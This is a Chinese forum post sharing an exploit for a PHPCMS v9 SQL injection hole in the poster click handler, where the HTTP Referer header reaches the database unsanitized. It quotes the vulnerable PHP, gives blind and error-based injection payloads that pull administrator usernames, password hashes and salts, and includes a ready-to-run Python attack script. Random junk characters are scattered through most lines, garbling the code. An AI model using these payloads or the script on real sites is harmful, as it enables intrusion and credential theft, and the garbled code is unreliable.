有人放出了phpcmsv9的0day,就随时写了个利用代码,其中注入代码有两种形式:) W5 n9 u& K' p' L
/ X& `- p6 F% w( p' j- v
问题函数\phpcms\modules\poster\index.php+ K* }# f8 W( R+ B& o h( x
6 |! e* z0 N3 ~% P Y( |* D7 M
public function poster_click() {2 B2 j% |# A' m) O$ S. h7 o# x4 a3 {
$id = isset($_GET['id']) ? intval($_GET['id']) : 0;
6 _: d* ^& c, |4 c' ^. @& Z, u$r = $this->db->get_one(array('id'=>$id));
3 g; N" Z k& k- Eif (!is_array($r) && empty($r)) return false;/ \) u: m) j0 s8 L( A
$ip_area = pc_base::load_sys_class('ip_area');+ y; Y% d# A. g h# Y; G
$ip = ip();- J6 C' ^( M# E" b7 |' O
$area = $ip_area->get($ip);8 q: g! \4 h8 p8 z. f
$username = param::get_cookie('username') ? param::get_cookie('username') : '';
) i2 T& s2 L! T/ \; k( T% fif($id) {
3 q5 p0 y) W6 |. g: I3 V$siteid = isset($_GET['siteid']) ? intval($_GET['siteid']) : get_siteid();8 s! |$ ~* ^5 l: C+ V- S
$this->s_db->insert(array('siteid'=>$siteid, 'pid'=>$id, 'username'=>$username, 'area'=>$area, 'ip'=>$ip, 'referer'=>HTTP_REFERER, 'clicktime'=>SYS_TIME, 'type'=> 1));
y) j. }5 S G. `$ o; i$ X& m}8 [- h" R$ _0 V: d- L! @; ~
$this->db->update(array('clicks'=>'+=1'), array('id'=>$id));' V# D7 H5 K+ ~5 o( c# t2 r4 {
$setting = string2array($r['setting']);
, Y- e$ T( f/ N3 `; J- Sif (count($setting)==1) {
3 i; C" r! [0 G) S$url = $setting['1']['linkurl'];
- r' _; Q4 N6 H) D8 @4 }8 t( X} else {
/ `- k' q# Z* W2 @: q4 f5 z$url = isset($_GET['url']) ? $_GET['url'] : $setting['1']['linkurl'];
' P7 E# o6 y3 W5 r1 [+ E, p} m; ]$ ]& I8 b0 ^0 [
header('Location: '.$url);4 w" } t/ T# o4 S. t( m3 a
}6 \& H1 s5 I( I8 x# G; G$ p
2 h4 ?3 H7 L' i4 V" ` Y# N" {
/ O' J# V2 K- P. O! c& h% Q. U
5 T6 a' `! e6 b% C利用方式:
, w# p# i- t3 k( F! T* z1 `) x( L" X( }% b( Q/ V
1、可以采用盲注入的手法:
0 O+ t# ]. u; r4 X
. c4 F) ~/ r/ r9 H+ b( Kreferer:1′,(select password from v9_admin where userid=1 substr(password,4)=’xxoo’),’1′)#
9 p3 _/ k, `; s2 q$ H" \ V t$ [" {4 I& M$ n$ G( g/ ^" j
通过返回页面,正常与否一个个猜解密码字段。
, T9 K! c- G! {
: L1 y% ?6 |. t0 S) w2、代码是花开写的,随手附上了:
2 s( I/ q( J& S8 J1 H8 }
' F5 i$ _, a ]3 ?* F. k( c1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#
6 C, E0 H# u0 o9 z) M7 ?/ c- ^+ D+ n# I4 q# Q/ v
此方法是爆错注入手法,原理自查。
7 U$ V! I/ w2 G. v6 Z$ `9 H* _7 P% r9 P; \ ~& B9 K( ~* p
8 i U* D, e; K; R# \/ B3 ^+ v! W3 S' w( u2 `, U0 H
利用程序:- V- y+ r7 _% O3 E# Z# p: [
6 i/ g& K: s: ~#!/usr/bin/env python
! ]& F0 r6 A0 himport httplib,sys,re9 s* @- Z( w# W K" ^- P( b/ W
5 P" b! z8 ~% A* v9 W' u. Fdef attack():1 C, X4 T m$ t: B
print “Code by Pax.Mac Team conqu3r!”
9 [* r5 a0 M6 ^* {* nprint “Welcome to our zone!!!”. X$ ]9 G8 p' Q- r) Y& `
url=sys.argv[1]+ b: J8 W4 K$ Z2 P/ N$ M: G3 I
paths=sys.argv[2]
) {7 {3 B$ O/ a8 B! H3 iconn = httplib.HTTPConnection(url)
/ {) i! B9 R! e' T1 [: q' t" ri_headers = {“User-Agent”: “Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5″,; w# }" T ]$ R
“Accept”: “text/plain”,& A# W% b0 b# E8 I% E. u0 ? n7 d
“Referer”: “1′,(SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(SELECT concat(username,0x5f,password,0x5f,encrypt) FROM v9_admin WHERE 1 ))a from information_schema.tables group by a)b),’1′)#”}
+ Z* W8 x# r% ~+ Q' x9 d8 \conn.request(“GET”, paths+”/index.php?m=poster&c=index&a=poster_click&sitespaceid=1&id=2″, headers = i_headers), `3 t3 J; W% X3 Q4 K. d
r1 = conn.getresponse()
) y2 @2 v' _: U) X( Edatas=r1.read()2 Q0 @: r9 `4 h7 ?' J
datas=re.findall(r”Duplicate entry \’\w+’”, datas)
2 k/ g* F7 D/ N' V, c rprint datas[0]
' I/ W s( J: n; Pconn.close()1 x0 c2 {0 F' e( i
if __name__==”__main__”:9 @! D- C/ x! o; s
if len(sys.argv)<3:
|& Z3 h! ]' K" k' l# d$ `/ F0 `print “Code by Pax.Mac Team conqu3r”
4 B- a1 m7 H+ M$ C9 Q. _7 o) _print “Usgae:”' @2 Y3 T% V+ x( h5 n7 j
print “ phpcmsattack.py www.paxmac.org /”
2 y/ p2 l; {5 K# H& [print “ phpcmsataack.py www.paxmac.org /phpcmsv9/”
* t1 G% K L) K% r1 e# lsys.exit(1)
- i4 D) ]3 U' pattack()
/ C: _7 `& i$ f+ e% }6 |$ q" a; D
( b' l: C# s2 [ |
发表于 2013-1-11 21:01:00
收藏
支持
反对